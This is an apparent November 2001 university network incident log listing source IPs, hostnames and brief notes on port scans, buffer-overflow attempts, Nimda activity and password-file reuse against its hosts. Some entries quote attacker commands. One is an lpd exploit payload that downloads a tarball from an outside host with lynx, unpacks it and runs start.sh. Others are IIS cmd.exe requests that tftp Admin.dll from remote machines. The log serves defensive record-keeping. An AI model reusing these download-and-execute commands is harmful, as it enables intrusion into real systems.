Short summary of some of the attacks against us for Nov. 2001 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2001/11/01-06:15:35.85 61.147.60.87 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 2001/11/01-07:25:36.27 61.147.60.198 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 2001/11/01-07:29:53.34 212.47.236.145 (dyn-212-47-236-145.ppp.tiscali.fr) scan net for port 21 2001/11/01-07:54:03.79 132.235.245.44 (edison.biotech.ohiou.edu) scan 132.235.1.[1,2] for port 389 UDP 2001/11/01-08:17:23.56 61.147.60.152 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 thru 2001/11/02-05:05:12.44 2001/11/01-12:22:17.87 62.149.130.183 (Technorail srl,IT) lowscan of net of 1 high number port per ip 2001/11/01-17:22:56.36 204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com) scan net for port 137 2001/11/01-17:25:12.65 204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com) scan net for port 161 2001/11/01-17:27:50.93 204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com) portscan multiple machines 2001/11/01-19:20:08.20 61.147.229.67 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 2001/11/01-19:20:08.20 61.147.229.67 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 2001/11/01-20:35:55.69 61.147.60.87 (CHINANET Jiangsu province network,CN) try to use 132.235.1.35 port 80 2001/11/01-22:54:42.38 132.235.164.69 (e4069.east-green.ohiou.edu) scannet for port 21 2001/11/01-23:22:23.07 211.137.65.157 (China Mobile Communications Corporation,CN) scan net for port 111+buff overflow attacks 2001/11/01-23:22:33.28 211.137.65.189 (China Mobile Communications Corporation,CN) scan net for port 111+buff overflow attacks 2001/11/02-03:18:41.13 203.130.232.144:111 (www.telkomkal.com) scannet for port 111 2001/11/02-12:11:45.93 64.245.51.82 (OriginNetworks,TX.US) scan net for port 111 + buff overflow attacks 2001/11/02-10:24:31.15 80.16.236.235 (RTC S.P.A.,IT) scan net for port 111 2001/11/02-12:05:02.08 80.16.236.235 (RTC S.P.A.,IT) buff overflow attacks statd 2001/11/02-14:04:11.16 211.154.103.70:21 (guangzhou branch,network 263 group,CN) scannet for port 21 2001/11/03-17:01:23.81 132.235.245.77 (*.ohiou.edu) start of nimba attacks again.... 2001/11/03-17:44:26.31 132.235.170.57 (w2057.west-green.ohiou.edu) start of nimba attacks again.... 2001/11/03-07:57:44.23 64.168.3.86 (adsl-64-168-3-86.dsl.scrm01.pacbell.net) scannet for port 515 2001/11/03-11:17:52.51 193.253.188.234 (ALyon-201-1-3-234.abo.wanadoo.fr) scannet for port 21 2001/11/03-15:30:28.03 24.90.11.72 (24-90-11-72.si.rr.com) scan net for port 21 2001/11/03-20:42:50.91 211.137.65.157 (China Mobile Communications Corporation,CN) SCAN net for port 80- yes,scan, not nimba 2001/11/03-22:28:52.53 211.137.65.157 (China Mobile Communications Corporation,CN) probe web servers (GET x HTTP) 2001/11/04-05:57:08.83 132.235.170.57 (w2057.west-green.ohiou.edu) nimba attacks again today.... 2001/11/04-09:47:31.16 217.106.204.41 (Global-Alania ISP,RU) scannet for port 21 2001/11/04-10:00:27.16 217.106.204.41 (Global-Alania ISP,RU) portscan 132.235.1.1 2001/11/04-10:25:12.96 61.147.60.130 (CHINANET Jiangsu province network) conn to 132.235.1.35 port 80 2001/11/04-10:40:51.26 62.83.140.164 (164-MAD2-X22.libre.retevision.es) scan net for port 23 2001/11/04-10:54:45.74 62.83.136.148 (148-MAD2-X26.libre.retevision.es) scan net for port 23 2001/11/04-11:28:59.74 62.83.135.156 (156-MAD2-X27.libre.retevision.es) scan net for port 23 2001/11/04-12:44:02.68 217.80.150.243 ( pD95096F3.dip.t-dialin.net) scan net for port 21 2001/11/04-15:42:32.30 200.185.56.9 (opt-0-9.br.inter.net) scan net, 1 packet to random high numb. port on random ips. 2001/11/04-22:03:53.12 61.147.55.65 (CHINANET Jiangsu province network) conn to 132.235.1.35 ports 21,80 2001/11/04-22:14:57.87 61.147.60.89 (CHINANET Jiangsu province network) conn to 132.235.1.35 port 80 2001/11/04-23:22:10.57 193.253.203.63 (ABoulogne-103-1-1-63.abo.wanadoo.fr) scan net for port 21 2001/11/04-23:52:31.94 208.235.227.196 (ABS-CBN ,Palo Alto, CA,US) scannet for port 111+buff overflow attacks 2001/11/05-00:39:43.58 200.18.6.95 (nte.udesc.br) scannet for port 515+buff overflow attacks 2001/11/05-00:50:43.86 61.147.60.141 (CHINANET Jiangsu province network) conn to 132.235.1.35 port 80 2001/11/05-03:06:04.37 61.147.53.131 (CHINANET Jiangsu province network) pound on 132.235.1.35 port 21 2001/11/05-06:56:51.44 132.235.170.57 (w2057.west-green.ohiou.edu) scan net for port 445,139 2001/11/05-08:49:37.04 217.0.79.175 (pD9004FAF.dip.t-dialin.net) scannet for port 21 2001/11/05-12:09:03.96 66.26.51.206:20 (rdu26-51-206.nc.rr.com) scannet for port 21 2001/11/05-14:45:00.81 211.46.58.193 (Daelim Elementary School,Chungju City,KR) scan net for port 111 2001/11/05-21:02:56.97 61.177.254.29 ( CHINANET Jiangsu province network) probe port 21 on 132.235.1.35 2001/11/05-22:35:48.47 202.96.209.186 (CHINANET Shanghai province network,CN) scan net for port 111 +rstatd buff overflow attacks 2001/11/05-23:50:57.69 198.111.39.240 (WWW4.LTU.EDU) scan net for port 111 + buff overflow attacks 2001/11/06-02:51:44.59 216.72.235.3 (AEROCONTINENTE ,FL,US) scannet for port 80 (whisker splice attack) 2001/11/06-07:53:33.30 202.96.209.186 (CHINANET Shanghai province network,CN) scannet for port 111,rstatd attack 2001/11/06-10:36:05.29 64.9.46.206 (Finger Lakes Press Inc.,NY,US) scannet for port 21 ftp site exec attack 2001/11/06-13:02:44.90 63.81.174.6 (KPMG, LLP ,VA,US) scan net for port 111, then 21 on select ips, ftp site exec attack 2001/11/06-14:14:51.33 217.224.197.147 (pD9E0C593.dip.t-dialin.net) scan net for port 21, anon ftp 2001/11/07-00:21:01.37 203.251.80.50 (taegu-cs-2.kornet.nm.kr) scannet ofr port 515 2001/11/07-00:24:56.21 203.251.80.50 (taegu-cs-2.kornet.nm.kr) start of intensive buff overflow attacks on port 515 2001/11/07-09:06:22.96 193.253.244.27 (ALagny-101-1-2-27.abo.wanadoo.fr) scannet for port 21 2001/11/07-10:47:51.82 203.238.253.60 (Munhwa Broadcasting System,SEOUL,KR) scannet for port 21 2001/11/07-17:06:15.95 195.12.96.180 (mail.akta.kz) scannet for prot 111 + buff overflow attacks 2001/11/07-19:50:37.80 24.232.109.13 (OL13-109.fibertel.com.ar) scannet for port 21 2001/11/07-23:49:28.64 204.215.251.130 (World Ramp ,FL,US) scannet for port 111 - rstatd attacks 2001/11/08-05:58:17.05 128.174.81.32 (tampico.cso.uiuc.edu) start of large number of dns queres for soa of domains 2001/11/08-07:37:45.25 64.34.202.41 (dsl-64-34-202-41.telocity.com) scannet for port 111 2001/11/08-11:04:17.32 128.174.81.32 (tampico.cso.uiuc.edu) start of hourly probe port 1111 on dns servers 2001/11/08-16:05:02.86 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan random ips doing day for ports 137,524 2001/11/08-16:07:09.63 211.251.205.194 (POKCHANG ELEMENTARY SCHOOL,KYONGGI,KR) scan net for port 53 2001/11/08-17:23:41.67 200.206.165.19 (200-206-165-19.dsl.telesp.net.br) scan net for port 515 2001/11/08-17:42:54.39 211.55.8.110 (HUMAN INCUBATOR CENTER ,SEOUL, KR) scannet for port 23 2001/11/08-19:29:28.48 66.108.114.41 (66-108-114-41.nyc.rr.com) scannet for prot 27374 2001/11/09-02:32:11.19 211.46.246.194 (Seokpo Elementary School,KYONGBUK,KR) scan net for port 111 2001/11/09-05:49:32.01 192.189.218.110 (Chugach Electric Association,AK,US) scan net f port 21 2001/11/09-05:57:03.20 192.189.218.110 (Chugach Electric Association ,AK,US) scan net for port 21 2001/11/09-06:04:11.07 128.174.81.32 (tampico.cso.uiuc.edu) connect to port 1111 on nameservers. 2001/11/09-22:14:19.55 64.59.58.60 (mail.pwcpa.com) scannet for port 23 2001/11/09-22:43:24.02 143.235.18.23 (University of Wisconsin-Centers,Madison,WI,US) scannet fo rport 1243 2001/11/10-01:53:53.16 212.16.34.9 (SERVER2.SSI.AT) scnanet for port 22(SYN FIN scan) 2001/11/10-01:57:12.86 209.122.167.62 (cornerstonehost14.erols.com) scan net for port 111 2001/11/10-06:25:51.44 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for port 524,137 (slow sacn, 1 per 5 hrs) 2001/11/10-10:31:42.98 206.47.188.14 (Real Time Tech Group,Ontario,CA) scannet for port 23 2001/11/10-13:30:54.83 4.61.32.93 (lsanca1-ar23-4-61-032-093.vz.dsl.gtei.net) scannet for port 21 2001/11/10-14:13:41.70 207.189.78.240 (s20000028su01.fplive.net) scann et for ports 6970,6972 2001/11/10-15:14:24.79 210.178.168.206 (SONGUI GIRLS HIGH SCHOOL,KYONGBUK,KR) scan net for port 111 2001/11/10-17:44:40.06 200.223.3.133 (?.TELEMAR-BA.NET.BR) scan 1 high number port per machine on net, slow scan 2001/11/11-01:43:51.76 193.158.93.148 (eutsche Telekom AG, ,STOLBERG,DE) scannet for port 111 2001/11/11-03:35:47.75 193.158.93.148 (eutsche Telekom AG, ,STOLBERG,DE) start of buff overflow attacks 2001/11/11-06:26:50.57 4.61.32.93 (lsanca1-ar23-4-61-032-093.vz.dsl.gtei.net) scannet for port 21 2001/11/11-07:34:58.12 132.235.104.134(dhcp-104-134.cns.ohiou.edu) scannet for port 524,137 (slow sacn, 1 per 5 hrs) 2001/11/11-16:11:40.95 204.215.251.130 (World Ramp,FL,US) scannet for port 111 2001/11/11-17:42:38.35 208.247.82.14 (Reynolds Plantation,Greensboro, GA,US) scannet fo port 111 +buff overflow attacks 2001/11/11-19:29:20.76 131.123.241.9 (baker.internet2.kent.edu) probe port 113 on 132.235.1.35 2001/11/11-21:11:31.54 195.223.1.130 ( GENESYS SRL,IT) scan net for port 21 2001/11/12-05:48:24.58 217.136.156.152 (adsl-72856.turboline.skynet.be) scannet fo rport 21 2001/11/12-07:23:24.49 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for port 524,137 (slow sacn, 1 per 5 hrs) 2001/11/12-22:56:41.76 217.96.240.90 (pe90.opole.sdi.tpnet.pl) scannet for port 515 2001/11/13-06:04:09.18 211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BIEJING,CN) large scale scan of net, multple ports 2001/11/13-06:09:22.89 211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN) portscan 132.235.2.51 2001/11/13-06:09:33.10 211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN) portscan 132.235.3.136 2001/11/13-06:09:34.87 211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN) and other portscans to 2001/11/13-07:20:12.13 2001/11/13-06:26:01.86 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2001/11/13-06:26:49.72 24.216.110.42 (the.GodFather.Dr-Ice.com) scan 1 high number port per machine on net, slow scan all day 2001/11/13-07:32:36.92 128.175.110.17 (host17.facil.udel.edu) scannet for port 111 2001/11/13-09:27:52.28 143.248.158.85 (neuron.kaist.ac.kr) scan net for port 111 2001/11/13-09:32:06.37 128.175.110.17 (host17.facil.udel.edu) start of buff overflow attacks 2001/11/13-11:55:13.80 143.248.158.85 (neuron.kaist.ac.kr) start of buff overflow attacks 2001/11/13-19:21:11.53 193.252.36.80 (AToulouse-101-1-1-80.abo.wanadoo.fr) scannet for port 21 2001/11/14-09:56:14.28 217.128.23.104 (AAubervilliers-101-1-4-104.abo.wanadoo.fr) scannet for port 21 2001/11/14-10:45:27.91 132.235.8.34 (redbudcm1a.cats.ohiou.edu) portscan 132.235.3.154 ports 143,110,9110,9143,993,995 2001/11/14-12:21:43.58 24.176.176.176 (cc451128-b.rcrdva1.ca.home.com) pound on 132.235.3.155 : 6346 to 2001/11/14-23:25:06.59 2001/11/14-13:08:36.79 66.74.26.90 (we-66-74-26-90.we.mediaone.net) pound on 132.235.201.195 : 6346 to 2001/11/15-00:01:25.51 2001/11/14-17:37:25.45 208.198.210.6 (use210-6.carr.org) scannet fo rport 111 2001/11/14-21:21:33.55 64.214.30.92 (irc.east.gblx.net) scan 1 high number port per machine on net, slow scan all day 2001/11/15-05:58:00.73 64.214.30.92:6667 (irc.east.gblx.net) scan 1 high number port per machine on net, slow scan all day 2001/11/15-06:12:44.87 200.185.45.37 (www.cbtenis.com.br) scan 1 high number port per machine on net, slow scan all day 2001/11/15-07:14:36.07 62.149.172.248 (Technorail srl,IT) scan net for port 23, then 111 on selcted ips., then port 21 2001/11/15-11:34:46.58 65.106.151.170 (Concentric Network Corporation) scannet for port 80 2001/11/15-14:57:00.82 134.93.129.123 (down.Physik.Uni-Mainz.DE) scannet for port 1214 2001/11/15-16:49:15.61 132.235.96.197 (dhcp-096-197.cns.ohiou.edu) portscan 132.235.15.36 2001/11/15-18:07:34.38 206.19.15.55 (san-28-d-55.san.dsl.cerfnet.com) scan net for port 515 + buff overflow attacks 2001/11/15-18:46:17.43 217.228.171.244 (pD9E4ABF4.dip.t-dialin.net) scannet for port 1214 - slow scan til 2001/11/16-00:34:07.01 2001/11/15-23:08:00.93 206.130.183.130 (irc2.magic.ca) scan 1 high number port per machine +-+ 217.96.199.243 : 3027 132.235.1.2 : 515 6 5 baw bax TCP 428 48 2001/11/23-04:41:40.68 2001/11/15-23:21:50.29 206.167.75.78 (cricri.qeast.net) scan 1 high number port per machine 2001/11/16-04:08:45.95 195.159.0.90:6667 (irc.homelien.no) can 1 high number port per machine on net, slow scan all day 2001/11/16-05:58:28.50 134.93.129.123 (down.Physik.Uni-Mainz.DE) scan net for port 1214 2001/11/16-07:49:35.76 195.159.0.90:666[6,7] (irc.homelien.no) can 1 high number port per machine on net, slow scan all day 2001/11/16-10:07:31.37 193.131.189.189 (Fiberlink Communications,GB) scannet for port 111 2001/11/16-10:08:02.27 208.10.29.6:0 (BEN VARADA & ASSOCIATES ,WA,US) scannet for port 1023`4,3072 2001/11/16-10:57:30.17 24.44.10.163 (ool-182c0aa3.dyn.optonline.net) probe port 6346 on 132.235.201.213 about 100 times 2001/11/16-11:38:19.53 143.248.158.85 (neuron.kaist.ac.kr) scan net for port 111 2001/11/16-11:51:35.28 193.131.189.189 (Fiberlink Communications,GB) start of buff overflow attacks (rstatd) 2001/11/16-12:09:58.69 132.235.159.34 (s7034.south-green.ohiou.edu) portsscan 132.235.16.101 2001/11/16-13:34:23.72 143.248.158.85 (neuron.kaist.ac.kr) start of buff overflow attacks 2001/11/17-00:41:09.30 210.99.14.65 (DOLMA ELEMANTARY SCHOOL,KYONGGI,KR) scan net for port 111 + buff overflow attacks (rstatd) 2001/11/17-06:20:54.97 195.159.0.90:666[6,7] (irc.homelien.no) can 1 high number port per machine on net, slow scan all day 2001/11/17-07:48:00.95 200.11.225.253 (TRUE, The Real Unix Experts,CARACUS,VE) scan net for port 21 2001/11/18-06:25:53.90 195.159.0.90:666[6,7] (irc.homelien.no) can 1 high number port per machine on net, slow scan all day 2001/11/18-16:22:15.98 61.119.62.99 (Limited Company Asuka Consultant,JP) scan net for port 111 2001/11/18-20:20:15.94 209.249.97.208 (infinite.wezl.org) conn to 132.235.3.0,1 packet to random high port/5 minutes 2001/11/18-21:05:51.09 210.99.14.65 (DOLMA ELEMANTARY SCHOOL,,KYONGGI,KR) scan net for port 111 + buff overflow attacks (rstatd) 2001/11/19-01:52:41.63 211.201.36.200 (Hanaro Telecom, Inc,KR)) sscan net for port 21, anon ftp attack 2001/11/19-03:49:00.54 61.147.63.9 (CHINANET Jiangsu province network,CN) probe prot 21 on 132.235.1.35 2001/11/19-06:11:10.40 195.159.0.90:666[6,7] (irc.homelien.no) can 1 high number port per machine on net, slow scan all day 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 1.try to login w/ login/passwd from ftp'd passwd file on ace 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 2. portscan ace 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 3. numerous (760) attacts against web server on ace 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 4. Entity too stupid to cut and paste login.passwd on screen, 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 5. instead, cut and pasted - 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 6. "Hacker's UTiLiTY JACKPOT Passwords." plus entire line from 2001/11/19-15:59:58.35 62.82.87.39 (39-VALE-X52.libre.retevision.es) 7. unencrypted passwd file. 2001/11/19-18:22:44.49 132.235.8.76 ( securityscan.cns.ohiou.edu) portscan 132.235.1.[1,2,3] 2001/11/20-07:00:31.59 61.142.0.171 (CHINANET Guangdong province network,CN) scan net for port 80 2001/11/20-07:17:17.57 202.30.143.101 (mail1.shinbiro.com) scan 1 high number port per machine on net, slow scan all day 2001/11/20-10:08:19.58 146.229.4.165 (University of Alabama) portscan 132.235.19.44 2001/11/20-14:03:59.31 209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net) portscan 132.235.1.1 2001/11/20-14:07:19.01 209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net) 1. try to telnet/ftp to 132.235.1.1 as root 2001/11/20-14:07:19.01 209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net) 2. andc others, using passwds from fake 2001/11/20-14:07:19.01 209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net) 3. password file on 132.235.1.2. 2001/11/20-14:19:19.74 209.245.231.214 (dialup-209.245.231.214.Dial1.Dallas1.Level3.net) portscan 132.235.1.2 2001/11/20-14:33:28.96 209.245.237.29 (dialup-209.245.237.29.Dial1.Dallas1.Level3.net) portscan 132.235.1.2 2001/11/20-23:08:39.29 80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr) scannet for port 21 2001/11/21-00:57:54 80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr) scannet for port 21 2001/11/21-07:22:13 213.154.73.162 (Societe Nationale Des Telecommunications Du Senegal,SN) scannet for port 111 2001/11/21-08:34:48.19 171.68.99.25 (pgavazzi-lnx.cisco.com) several probes to port 80 on 132.235.1.68. Weird. 2001/11/21-10:30:52.50 199.125.55.250 (mcinternet01.ceg.com) heavy portscan of 132.235.1.2 2001/11/21-12:46:38 217.136.5.218 (adsl-34266.turboline.skynet.be) scannet for port 21 2001/11/21-12:46:38.08 217.136.5.218 (adsl-34266.turboline.skynet.be) scannet for port 21 2001/11/21-13:53:22.59 195.215.184.253 (0xc3d7b8fd.abnxx3.adsl.tele.dk) transfer of warez to hacked machine 2001/11/21-13:53:53.92 24.31.173.163 (dhcp31173163.columbus.rr.com) portscan 132.235.16.170 2001/11/21-14:06:15 132.235.197.29 (netmgt1.cns.ohiou.edu) scannet for port 161 2001/11/21-16:43:04.76 132.248.168.29 (tauro.dgsca.unam.mx) scannet for port 111 2001/11/21-18:36:44.31 132.248.168.29 (tauro.dgsca.unam.mx) start of buff overflow attacks 2001/11/21-21:20:49.82 24.15.241.31 (c117785-a.alntn1.tx.home.com) scannet for port 110 2001/11/21-21:20:49.97 4.33.170.77 (evrtwa1-ar3-170-077.evrtwa1.dsl.gtei.net) scannet for port 110 2001/11/21-21:20:50.16 216.164.56.197 (r95aag006730.nyr.cable.rcn.com) scannet for port 110 2001/11/21-21:20:50.44 65.92.44.186 (HSE-Kitchener-ppp3507918.sympatico.ca) scannet fo port 110 2001/11/21-21:22:06.36 63.114.221.153 (customer-63-114-221-153.dialup.psouth.net) scannet for port 110 2001/11/21-21:23:42.88 209.226.57.29 (Kapuskasing-29.nt.net) scan net for port 110 2001/11/22-00:57:54.53 80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr) scannet for port 21 2001/11/22-07:06:46.21 80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr) scannet for port 21 2001/11/23-04:36:11.75 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) scannet for port 515 and 3879 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 1. attack line printer daemon on 132.235.4.27 with: 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 2. TERM="linux" 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 3. export PATH="/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin" 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 4. lynx -dump http://202.85.122.30/red2.tar >/usr/lib/red.tar 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 5. [ -f /usr/lib/red.tar ] || exit 0 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 6. cd /usr/lib;tar -xvf red.tar;rm -rf red.tar;cd lib;./start.sh 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 7. try to connect back to port 3879 on 132.235.4.27 2001/11/23-04:41:40.68 217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl) 8. large number of buff overflow attcks on 132.235.1.2 2001/11/23-04:56:38.03 202.103.209.38 ( CHINANET Guangxi province network,CN) scan net for port 80 2001/11/23-05:19:29.39 205.163.201.10 (ADC Telecom,MN,US) scan net for port 80 2001/11/23-09:43:24.04 217.57.186.124 (OPENNET S.P.A.,IT) scannnet for port 23 2001/11/23-11:20:34.67 217.128.255.14 (ATuileries-106-1-2-14.abo.wanadoo.fr) scannnet for port 21 2001/11/23-17:20:01.10 193.251.47.224 (ALagny-101-1-1-224.abo.wanadoo.fr) scannet for prot 21 2001/11/23-19:40:32.09 212.2.223.63 (Provider Local Registry,TR) scannnet for port 21 2001/11/23-19:40:32.15 212.0.120.252 (LISP-SL-ES,ES) scan net for port 21 2001/11/23-21:42:42.86 4.35.51.1 (lsanca1-ar8-051-001.lsanca1.dsl.gtei.net) scannet with ping (From Sun Solaris box) 2001/11/24-04:37:44.41 212.160.11.65 (pa65.zabkowice-slaskie.sdi.tpnet.pl) scannet for port 515, ident version 2001/11/24-06:12:19.03 200.185.45.37 (www.cbtenis.com.br) scan 1 high number port per machine on net, slow scan all day 2001/11/24-09:54:03.86 172.189.141.56 (ACBD8D38.ipt.aol.com) scan net for port 21 2001/11/24-14:26:13.01 217.136.158.129 (adsl-73345.turboline.skynet.be) scan netfor port 21 2001/11/24-16:48:06.42 210.243.244.245 (h245-210-243-244.seed.net.tw) scannet for port 111 2001/11/24-17:44:43.06 24.198.55.21 (ROADRUNNER-NORTHEAST ,VA,US) scannet for port 139,445 2001/11/25-01:18:40.46 211.210.121.155 (Hanaro Telecom, Inc.,KR) scan net for port 111-rstatd 2001/11/25-01:18:44.37 211.210.121.155 (Hanaro Telecom, Inc.,KR) start of buff overflow attacks-statd 2001/11/25-12:07:42.92 212.100.180.77 (212-100-180-77.adsl.easynet.be) scan net for port 21 2001/11/25-13:12:50.18 62.161.77.122 (ca-ol-sqy-6-122.abo.wanadoo.fr) probe portmapper on 132.235.1.1-mountd 2001/11/25-18:43:57.18 208.37.244.170 (w170.z208037244.nyc-ny.dsl.cnc.net) scan net for port 21 2001/11/25-22:22:00.28 132.254.84.2 (Instituto Tecnologico y de Estudios Superiores de Monterrey,MX) probe 132.235.1.59:80 100 times 2001/11/26-02:58:01.84 211.5.254.68 (hiroshima west information service coop..JP ) scannet for port 21 2001/11/26-06:52:39.61 132.240.40.63 (Vitalink Communications ,MA,US) scatn port 80 on 132.235.1.35 2001/11/26-07:21:45.05 213.154.73.162 (Societe Nationale Des Telecommunications Du Senegal,SN) scannet for port 111 2001/11/26-12:35:26.60 62.253.140.118 (pc1-ipsw2-0-cust118.cam.cable.ntl.com) scannet for port 21 2001/11/26-16:52:21.15 217.10.197.54 (MobiFon S.A.,Bucharest, Romania) scan 1 high number port per machine on net, slow scan all day 2001/11/26-19:22:23.63 168.143.176.173 (Verio, Inc.,CO,US) scan net for ports 1024,3072 2001/11/26-20:17:48.54 132.250.112.76 (death-star.nrl.navy.mil) scan net for port 80, IIS attacks 2001/11/26-20:28:56.89 132.250.151.18 (hu-pc.nrl.navy.mil) scan net for port 80, IIS attacks 2001/11/26-20:32:42.28 168.143.176.173 (Verio, Inc.,CO,US) scannet for port 1024,3072 2001/11/26-20:39:30.64 217.10.197.54 (MOBIFON, BUCHAREST,RO) scan 1 high number port per machine on net, slow scan all day 2001/11/26-22:25:56.70 204.101.179.3 (suroit.rocler.qc.ca) scan 1 high number port per machine on net, slow scan all day 2001/11/26-23:15:34.32 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for port 21 2001/11/27-00:02:46.45 61.147.44.199 (CHINANET Jiangsu province network,CN) portscnnet for port 80 2001/11/27-00:02:56.86 61.147.44.199 (CHINANET Jiangsu province network,CN) scannet for port 80, check for GET...cmd.exe?/c+dir 2001/11/27-00:15:02.16 61.147.44.199 (CHINANET Jiangsu province network,CN) 1. attack several ips via web server, root.exe - 2001/11/27-00:15:02.16 61.147.44.199 (CHINANET Jiangsu province network,CN) 2. tftp Admin.dll from 132.235.32.108 !! 2001/11/27-04:04:42.34 61.171.125.9 (CHINANET Shanghai province network,CN) scan 132.235.1.35 for port 80 2001/11/27-04:22:36.14 61.147.44.209 (CHINANET Jiangsu province network,CN) portscnnet for port 80 2001/11/27-04:22:45.05 61.147.44.209 (CHINANET Jiangsu province network,CN) scannet for port 80, ips in random order. 2001/11/27-04:35:50.54 61.147.44.209 (CHINANET Jiangsu province network,CN) IIS attack, tftp from 132.235.32.108 2001/11/27-05:48:43.16 217.229.69.92 (pD9E5455C.dip.t-dialin.net) scann net for port 21 2001/11/27-05:49:00.24 217.229.69.92 (pD9E5455C.dip.t-dialin.net) scan net for port 21 2001/11/27-06:53:45.74 209.98.24.254 (igloo.windchill.com) IIS attack, tftp files from 132.253.10.103 2001/11/27-14:41:07.74 172.191.50.30 (ACBF321E.ipt.aol.com) scan netfor port 21 2001/11/27-16:23:55.66 62.253.140.118 (pc1-ipsw2-0-cust118.cam.cable.ntl.com) scan net for port 21, anon ftp attacks 2001/11/27-17:01:19 210.0.202.100 (Hutchison Telecommunications (Hong Kong) Limited,HK) scan net on port 22 2001/11/27-22:53:57.60 217.128.92.112 (ANeuilly-101-1-6-112.abo.wanadoo.fr) scannet for port 21 2001/11/28-06:41:27.58 24.178.52.181 (c1807622-a.muskgn1.mi.home.com) scan net for port 80 2001/11/28-06:41:28 24.178.52.181 (c1807622-a.muskgn1.mi.home.com) scan net for port 80 2001/11/28-11:25:16.96 217.10.197.54 (MOBIFON, BUCHAREST,RO) scan 1 high number port per machine on net, slow scan all day 2001/11/28-12:15:47.93 61.182.255.2 (CHINANET Hebei province network,CN) scan net for port 111 2001/11/28-12:39:39.90 61.182.50.241 (CHINANET Hebei province network,CN) scan net for port 111 2001/11/28-12:55:57.87 149.160.26.42 (Indiana University Southeast Computing Services,IN,US) 1. heavy, repeating scans of net for 2001/11/28-12:55:57.87 149.160.26.42 (Indiana University Southeast Computing Services,IN,US) 2. for port 3879 and 515 40/sec. 2001/11/28-12:55:57.87 149.160.26.42 (Indiana University Southeast Computing Services,IN,US) 3. redhat 7.0 lprd overflow attack. 2001/11/28-16:05:37 62.82.83.218 (218-VALE-X26.libre.retevision.es) 1. use decrypted passwd/logins from passwd file snarfed by 2001/11/28-16:05:37 62.82.83.218 (218-VALE-X26.libre.retevision.es) 2. anon-ftp. 2001/11/28-16:22:45.71 200.181.172.153 (1-153.ctame701-3.telepar.net.br) scan net for port 80, scan ping-nmap-icmp also 2001/11/28-18:12:26 24.198.55.21 (ROADRUNNER-NORTHEAST,VA,US) scan 132.235.3.x for port 139 2001/11/28-22:14:05.56 62.180.231.5 (BT Ignite GmbH,DE) scan ports 53,23,21,22 on 132.235.1.1 2001/11/28-23:13:30.64 216.133.163.119 (Prime Cable Of Chicago,US) scannet for port 21 2001/11/29-06:49:47.37 217.10.197.54 (MobiFon S.A., Romania) scan 1 high number port per machine on net, slow scan all day 2001/11/29-13:05:43.39 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scan net for port 524,137,139 2001/11/29-13:54:01.90 195.232.62.9 (UUNET-HIL-PPP-POOL,Frankfurt PPP Client Pool,DE) scannet for port 515 2001/11/29-15:30:50.66 212.143.33.7 (ADSLP33-NV-p7.adsl.netvision.net.il) scannet for port 21 2001/11/29-17:50:45.79 217.136.9.62 (adsl-35134.turboline.skynet.be) scan net for port 21 2001/11/29-23:03:31.20 61.177.254.221 (CHINANET Jiangsu province network,CN) 1. massive port 80 scans of net. Try ..\cmd.exe+ stuff, 2001/11/29-23:03:31.20 61.177.254.221 (CHINANET Jiangsu province network,CN) 2. try tftp%20-i%20132.235.33.23%20GET%20Admin.dl 2001/11/30-06:41:05.95 210.226.107.114 (altamoda co.,ltd., JP) scan 132.235.1.43 for ports 6000[0,1],1000[8,9] 2001/11/30-07:59:32.16 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for port 21, anon ftp attack 2001/11/30-07:59:32.75 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scan net for port 